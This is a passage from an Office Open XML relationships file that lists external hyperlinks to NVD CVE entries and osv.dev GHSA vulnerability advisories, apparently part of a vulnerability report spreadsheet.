Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2x7j-588g-ccc2" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId1081" /></Relationships>
</file>

